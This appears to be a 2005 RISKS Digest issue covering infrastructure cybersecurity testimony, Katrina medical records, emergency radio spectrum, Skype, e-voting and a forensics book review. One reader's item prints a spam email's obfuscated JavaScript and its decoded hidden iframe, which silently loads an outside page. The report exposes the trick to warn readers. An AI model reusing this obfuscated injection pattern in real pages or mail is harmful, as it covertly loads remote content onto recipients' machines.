Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
Committee on Science, SHERWOOD BOEHLERT, CHAIRMAN Bart Gordon, Tennessee, Ranking Democrat http://www.house.gov/science/press/109/109-129.htm Press Contacts: Joe Pouliot (202) 225-4275 WASHINGTON, D.C., September 15, 2005 - In testimony before the House Science Committee today, the Chief Information Officers (CIOs) of major U.S. corporations warned Congress that the nation's critical infrastructure remains vulnerable to cyber attack. The witnesses said the economy is increasingly dependent on the Internet and that a major attack could result in significant economic disruption and loss of life. Urging action to address this vulnerability, the witnesses advocated increased funding for cybersecurity research and development (R&D) and greater information sharing between industry and government and among various sectors of industry. Witnesses also urged greater federal attention to cybersecurity and praised the creation of an Assistant Secretary for Cybersecurity at the Department of Homeland Security (DHS). Testifying before the Committee were: Mr. Donald "Andy" Purdy, Acting Director, National Cyber Security Division, Department of Homeland Security; Mr. John Leggate, Chief Information Officer, British Petroleum Inc.; Mr. David Kepler, Corporate Vice President, Shared Services, and Chief Information Officer, The Dow Chemical Company; Mr. Andrew Geisse, Chief Information Officer, SBC Services Inc.; and Mr. Gerald Freese, Director, Enterprise Information Security, American Electric Power. "We shouldn't have to wait for the cyber equivalent of a Hurricane Katrina to realize that we are inadequately prepared to prevent, detect and respond to cyber attacks," said Science Committee Chairman Sherwood Boehlert (R-NY). "And a cyber attack can affect a far larger area at a single stroke than can any hurricane. Not only that, given the increasing reliance of critical infrastructures on the Internet, a cyber attack could result in deaths as well as in massive disruption to the economy and daily life. "So our goal this morning is to help develop a cybersecurity agenda for the federal government, especially for the new Assistant Secretary. I never want to have to sit on a special committee set up to investigate why we were unprepared for a cyber attack. We know we are vulnerable, it's time to act." Legate testified that an informal survey earlier this year found that executives in the telecommunications, energy, chemical, and transportation sectors estimated that about 30 percent of their revenue depends directly on the Internet. He also said that, because of interdependency among various industry sectors, a single attack could reverberate throughout the global economy: "These cascading dependencies all too quickly create 'domino effects' that are not obvious to the corporate customer or the policymaker." Kepler told the Committee that the greatest concern for the chemical industry is the potential for a combined cyber and physical attack. He said he fears a potential terrorist "using information on shipments, product inventory, or sites to construct a physical attack.using false identity to acquire chemicals for improper use, [or].gaining inappropriate access to systems to cause isolated disruptions." To help prevent these scenarios from being realized, Kepler urged greater industry input in the government's critical infrastructure protection efforts. "Information sharing and continued cooperation between our sector and the Department of Homeland Security is critical," he testified. "Above all else, efforts must be focused on those threats of greatest impact and concern to our national security, while addressing the unique needs of each sector." Freese said the security of his sector could also be enhanced through increased coordination with federal agencies, such as DHS. He also urged greater R&D funding to guide the development of a next generation Internet and a generation power grid system that will have built-in security features to protect against cyber attacks. "The long term solution to present inadequacies is to build out the old infrastructure with the next generation of technologies and equipment. The new infrastructure will be based on greater levels of security and reliability, enhanced design, and recognition of the interdependencies between the electricity sector and the communications sector." The industry witnesses praised the creation of the Assistant Secretary position and said it will result in greater attention to cybersecurity issues. Geisse also urged DHS to continue its focus on cyber-related activities that have proven successful. He said, "We encourage the Department of Homeland Security to continue to: support research grants and assistance that focus on national cybersecurity; support industry organizations and government agencies that create security standards and best practices; provide early warnings of security events through various government agencies; and make sure the security best practices that various critical government agencies develop are shared with our critical infrastructure industries." 109-129
They told you so (2002): - SPECIAL REPORT from THE TIMES-PICAYUNE - It's only a matter of time before South Louisiana takes a direct hit from a major hurricane. Billions have been spent to protect us, but we grow more vulnerable every day. Five-Part Series published June 23-27, 2002 http://www.nola.com/hurricane/?/washingaway/ They told you so (2004) What if Hurricane Ivan Had Not Missed New Orleans? Disasters Waiting to Happen . . . Sixth in a Series Natural Hazards Observer, 2 November 2004 http://www.colorado.edu/hazards/o/nov04/nov04c.html A couple of examples from many on http://en.wikipedia.org/wiki/Predictions_of_hurricane_risk_for_New_Orleans What use are calculations and predictions of risk, without the institutions and the political will to react to them? From a viewpoint outside the US, the response to the Katrina disaster has been quite frankly unbelievable -- sending in troops with guns as a priority over medical and humanitarian assistance being the most bizarre. The really big risk is the deep-seated systemic and institutional malaise for which such responses are symptoms. This is far more than merely a hurricane. Inman Harvey, Evolutionary and Adaptive Systems Group, COGS/Informatics, Univ. of Sussex, Brighton BN1 9QH, UK http://www.cogs.susx.ac.uk/users/inmanh/
The federal government is making medical information on Hurricane Katrina evacuees available online to doctors, the first time private records from various pharmacies and other health care providers have been compiled into centralized databases. The data contain records from 150 Zip codes in areas hit by Katrina. Starting yesterday, doctors in eight shelters for evacuees could go to the Internet to search prescription drug records on more than 800,000 people from the storm-racked region. Officials hope to soon add computerized records from Medicaid in Mississippi and Louisiana, Department of Veterans Affairs health facilities, laboratories and benefits managers. The records are one step in reconstructing medical files on more than 1 million people disconnected from their regular doctors and drug stores. Officials fear that many medical records in the region, especially those that were not computerized, were lost to the storm and its aftermath. Although the immediate focus is on urgent care for hurricane victims, participants in the effort say the disaster demonstrates a broader need to computerize individual health records nationwide and make them available throughout the medical system. Such a step could, for example, give emergency room doctors a way to quickly view medical histories for late-night accident victims. Electronic health records are controversial among many privacy advocates, who fear the data could be exploited by hackers, companies or the government. [Source: Jonathan Krim, Government Wants Doctors in Shelters to Have Data, *The Washington Post*, 14 Sep 2005, A24; Thanks to Keith A Rhodes. PGN-ed. The article has considerable discussion on the privacy implications.]
It is sad that politicians start to believe that they know how to solve technical problems. One such sad case was Rudy Giuliani's pronouncement today that a single frequency (then frequency band) for all emergency services would make things work better. Now I am hardly the world's leading expert on radio frequency spectrum allocation, but I do have some small amount of experience in understanding radio communications and emergency response, and I was startled, well not all that startled, perhaps bemused at the lack of understanding displayed by people who are not risk management professionals. Of course it seems that a lot of political folks think that they can do as good a job as risk management professionals, and likely that is why we are in such a sad state as a nation state at handling emergencies. I haven't done a complete assessment of the suggestion, but here are some initial thoughts. The idea is that communications will work better if everyone can talk to each other and therefore a single frequency band would allow them to do so and improve emergency communications. Sounds sensible, however... 1) It means that in order to disrupt ALL emergency communications I only need to jam one frequency band. 2) Different natural and artificial phenomena interfere with RF communications in different frequency bands, so by using a relatively limited portion of the available bandwidth, there is a guarantee that in some places no communications will work. 3) If I want to listen into your communications, it makes it a lot easier if I know the frequencies being used, and if everyone has to talk to each other, then anyone can listen to everyone else. Encryption won't solve this of course for the same reason. 4) If there is a big emergency and everyone is on a small subset of the bands available, there will be a lot of interference, reducing communications effectiveness. 5) Certain weather and other human induced conditions wipe out portions of the frequency band for periods of time, making ALL communications fail simultaneously (see 1 above). 6) Interference between jurisdictions means that dispatchers in one jurisdiction might end up talking over those of their neighbors, causing confusion and more traffic problems as well as increasing the potential for phony messages going on the air. You all get the idea by now. Of course the last assessment I did that involved a radio communications system for a local government was several weeks back, and we were a bit concerned that they only had 3 redundant ways to communicate via RF - Car radios that talk to towers in redundant locations - hand-held radios on a different frequency range that could talk to the towers, the cars, and each other independently of the other tower system, and cellular telephones that they could use when the other systems failed. They also reported problems of interference on rare occasions with the frequencies used by neighboring jurisdictions (see 6 above), but only in certain locations where they could communicate over quite a long distance because of weather-related signal bounces off of clouds. Different frequency bands are used for different things for good reasons, and there are good reasons that a single frequency band for emergency response would be a bad thing. Perhaps we should put Rudy in charge of FEMA and see if things get better or worse... after all, the last political appointee there with no expertise in emergency management worked out so well... Security Posture http://securityposture.com; University of New Haven; Fred Cohen & Associates 1-925-454-0171 Security Management Partners [Further discussion at iwar@yahoogroups.com, including whether one frequency or one frequency band was intended. PGN]
About 700,000 electric customers in Los Angeles lost power Monday afternoon (12 Sep 2005) after a worker mistakenly cut a wrong line, triggering a cascade of problems in the city's power grid, a spokesman for the Los Angeles Department of Water and Power said. [The latest report as this issue goes out is that the spec for the operation was incorrect, and that the crew did exactly as they had been told. PGN]
As I noted in: http://lists.elistx.com/archives/interesting-people/200509/msg00122.html eBay's acquisition of Skype (now official) leads to new concerns over the proprietary nature of Skype's security and encryption systems, which will now be under the control of an extremely large and powerful corporate entity. For eBay and Skype to have a chance of maintaining the goodwill and trust of Skype users, I call on Skype to forthwith release the specifications and implementation details of Skype's encryption and related technologies. This disclosure should ideally be made to the public, but at a minimum to an independent panel of respected security, privacy, and encryption experts, who can rigorously vet the Skype technology and make a public report regarding its security, reliability, and associated issues. There are also other significant concerns regarding this acquisition, relating to eBay's privacy policies and how they may impact the privacy of Skype users, but I'll hold those for a future message. Lauren Weinstein lauren@pfir.org 1 818-225-2800 http://www.pfir.org/lauren http://www.eepi.org http://daythink.vortex.com
[From SC-L, included in RISKS with permission of the author. PGN]
The *only* way to learn application security is to test applications "hands
on" and examine their source code. To encourage the next generation of
application security experts, the Open Web Application Security Project
(OWASP) has developed an extensive lesson-based training environment called
"WebGoat".
WebGoat is a lessons based, deliberately insecure web application designed
to teach web application security. Each of the 25 lessons provides the user
an opportunity to demonstrate their understanding by exploiting a real
vulnerability. WebGoat provides the ability to examine the underlying code
to gain a better understanding of the vulnerability as well as provide
runtime hints to assist in solving each lesson. V3.7 includes lessons
covering most of the OWASP Top Ten vulnerabilities and contains several new
lessons on web services, SQL Injection, and authentication.
WebGoat 3.7 is available for free download from:
http://www.owasp.org/software/webgoat.html
Simply unzip, run, and go to WebGoat in your browser to start learning.
The OWASP Foundation is dedicated to finding and fighting the causes of
insecure software. Find out more at http://www.owasp.org.
Announcing a new report from CSTB on Electronic Voting. Below is the media advisory on it. [Reproduced from Dave Farber's IP list.] Election officials across the United States are increasingly looking to electronic voting systems as a way to administer elections more efficiently, but skeptics have raised concerns about the security and reliability of these systems. ASKING THE RIGHT QUESTIONS ABOUT ELECTRONIC VOTING, new from the National Academies' National Research Council, offers a set of questions that policy-makers and the public should ask to help ensure that the technologies implemented are secure, reliable, efficient, and easy to use. Advance copies are now available to reporters. The report, which was chaired by DICK THORNBURGH, former governor of Pennsylvania, and RICHARD F. CELESTE, former governor of Ohio, was released on September 13, 2005, and is available free in PDF form at the web site below. Press release at http://www4.nationalacademies.org/news.nsf/isbn/0309100240?OpenDocument Full report at http://www.nap.edu/catalog/11449.html (sign-in required for the PDF version). Herb Lin, Senior Scientist and Study Director, CSTB National Academies, 1-202-334-3191
I received a spam this morning that opened audio files without me even
opening the e-mail. The spam was from 'news@capitalex.com' and had the
subject 'news'.
A closer looks reveals this code:
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%72%6F%66%6F%72%65%78%74%72%61%64%65%2E%63%6F%6D%2F%69%6D%61%67%65%73%2F%6E%65%77%65%78%2E%68%74%6D%6C%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%22%31%22%20%0D%0A%0D%0A%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->
</Script>
This decodes to
<IFRAME width="1" height="1"
SRC="http://www.proforextrade.com/images/newex.html" frameBorder="1"
scrolling="no"></IFRAME>
That page loads automatically, *without me having opened the e-mail*, then
runs a shed load of rubbish including two audio files.
Full e-mail with headers available on request.
Charles Lamb's comment on the REAL ID law, though technically correct, is
disingenuous. A National Research Council report ("Who Goes There --
Authentication Through the Lens of Privacy") noted this:
Finding 6.5: State-issued driver's licenses are a de facto nationwide
identity system. They are widely accepted for transactions that require a
form of government-issued photo ID.
Steven M. Bellovin, http://www.cs.columbia.edu/~smb
At either of these two URLs: http://xrl.us/hd9g http://yahoo.reuters.com/financeQuoteCompanyNewsArticle.jhtml?duid=mtfh39850_2005-09-01_15-31-19_n01450451_newsml you can read that Payments processor CardSystems Solutions Inc., where a security breach exposed more than 40 million credit card accounts to fraud, on Thursday said its auditor had completed a report to payment networks and concluded it complies with industry data-security standards. The sad thing is, it's probably true. Curt Sampson <cjs@cynic.net> +81 90 7737 2974 http://www.NetBSD.org
BKFORDIS.RVW 20050310 "Forensic Discovery", Dan Farmer/Wietse Venema, 2005, 0-201-63497-X, U$39.99/C$57.99 %A Dan Farmer zen@fish2.com %A Wietse Venema wietse@porcupine.org %C P.O. Box 520, 26 Prince Andrew Place, Don Mills, Ontario M3C 2T8 %D 2005 %G 0-201-63497-X %I Addison-Wesley Publishing Co. %O U$39.99/C$57.99 800-822-6339 Fax: (617) 944-7273 bkexpress@aw.com %O http://www.amazon.com/exec/obidos/ASIN/020163497X/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/020163497X/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/020163497X/robsladesin03-20 %O Audience a+ Tech 3 Writing 1 (see revfaq.htm for explanation) %P 217 p. %T "Forensic Discovery" In the preface, the authors don't promise to teach the reader anything about computer or digital forensics. Rather, they are reporting on ten years' worth of experience in looking into attacked machines. Given the authors' background, this is engrossing. But turning it into useful guidance might be left as an exercise for the reader. This is not a tutorial work for the novice, but a challenge to the experienced professional. Part one outlines the basic concepts of forensics in digital systems. Chapter one presents the "spirit of forensic discovery": look anywhere, for anything, and be prepared when you find it. (This is a tall order, particularly the "being prepared" part, but it basically corresponds to my experience.) Time information and stamps (on UNIX systems) are discussed in chapter two, along with mention of the ways that clumsy attempts to "save" systems can destroy ephemeral information. However, the level of the material sweeps between broadly generic and tightly specific: it may be difficult for those not already thoroughly familiar with forensic activities to obtain useful guidance from it. Part two is supposed to provide us with background on the abstractions of the computer and operating systems that relate to forensic recovery of materials. Chapter three addresses file system basics, but does so specifically with regard to the UNIX system. The content is much more detailed than conceptual (covering, for example, allowable characters in UNIX filenames), and command examples are not always completely explained. The usefulness of this approach is questionable, since the reader is assumed to know the UNIX system well; in which case, why cover the elementary fundamentals? However, the work does highlight aspects of operating and file system internals not encountered in normal administrative activity. Analysis of information recovered from a compromised system is reviewed in chapter four. The methods and procedures are very strictly limited by the case cited, but the examples demonstrate the backhanded thinking needed to obtain interesting data after an intrusion. A variety of intriguing ways to subvert a running system are examined in chapter five. As with previous material, the text seems to talk around the topic, while the examples, although fascinating, don't always support the general concepts under discussion. Analysis of the code of malicious software (a practice known in virus research as forensic programming) is addressed in chapter six, although the bulk of the content deals with test execution of the programming (under various forms of restriction) and both the benefit and complexity of disassembly is passed over rather lightly. Part three moves beyond the concepts and into practical difficulties. Chapter seven, although titularly about the contents of deleted files, is primarily concerned with the conservation and preservation of the access, modification, and (attribute) change times of files. (In response to the draft of this review, the authors clarified some of the points that they were trying to make in the text, such as the fact that material from deleted files is often more persistent than the content of active files. Unfortunately, these points, while arresting, are not always clear in the work itself.) Retrieving data from memory, particularly via the swap or paging areas of disk, is reviewed in chapter eight. The preface does state that the authors intend this book to be useful to sysadmins, incident responders, computer security professionals, and forensic analysts. I would suggest that only the last group will find much here that they can use, and then only those at the advanced edges of the field. There is certainly much that is intriguing, but the material demands of the reader that he or she have extensive background and knowledge of system and filesystem internals. Even then, extracting the information from the target system, and drawing conclusions as to the implications of that data, will be difficult. Farmer and Venema have outlined some fascinating material, on the bleeding edge of the technology, but have not made it easy for practitioners to utilize or comprehend. (In response to the draft review, The authors have noted that the full, original text of the book is now available at http://fish2.com/forensics/ or http://www.porcupine.org/forensics/.) copyright Robert M. Slade, 2005 BKFORDIS.RVW 20050310 rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade [I found this book to be very useful, timely, and interesting. PGN]
Please report problems with the web pages to the maintainer